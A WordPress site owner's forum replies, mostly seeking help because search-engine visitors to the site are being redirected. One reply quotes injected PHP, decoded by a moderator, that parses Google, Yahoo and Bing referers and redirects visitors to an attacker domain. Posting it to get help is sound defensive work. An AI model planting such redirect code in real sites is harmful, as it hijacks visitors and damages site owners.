rkudoz
Forum Replies Created
Viewing 4 replies - 1 through 4 (of 4 total)
-
Forum: Plugins
In reply to: [Plugin: WP Splash Image] Good Idea – Not Quite Implementedthis plugin is great and it does work,
but when implemented with Noctic theme, jquery sliders seems to be affected and wont work…
but im still looking for alternatives…
Forum: Fixing WordPress
In reply to: search results being redirectedi’ve found one solution… but im still checking on it. thank you for decoding it…:)
Forum: Fixing WordPress
In reply to: search results being redirectedi found that there was a code insertion… here’s the code:
if (stristr($_SERVER[HTTP_REFERER],"google")) { if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){ preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk); if (stristr($kk[1],"&")) { preg_match ("/(.*?)\&/",$kk[1],$key2); $keyword=urldecode($key2[1]); }else { $keyword=urldecode($kk[1]); } header("Location: https://bad.url.here.pl/?q=".$keyword); exit(); } }elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) { preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: https://bad.url.here.pl/?q=".$kk[1]); exit(); }elseif (stristr($_SERVER[HTTP_REFERER],"bing")) { preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: https://bad.url.here.pl/?q=".$kk[1]); exit(); }
[ Mod Note – base64 code decoded… ]
but the problem is, it keeps coming back after i delete it.
please advise..
Thank you…:)
Forum: Fixing WordPress
In reply to: search results being redirectedbtw, when i search Ron Silvoza’s Hub in google or any search engine it is being redirected to 302 -> https:// gberbhjerfds .osa .pl/?q=www.ronsilvoza.com. [ URL Edited to break link ]
Ive already checked my htaccess files and all are ok…
Also tried it on other computers and it does the same thing.
Viewing 4 replies - 1 through 4 (of 4 total)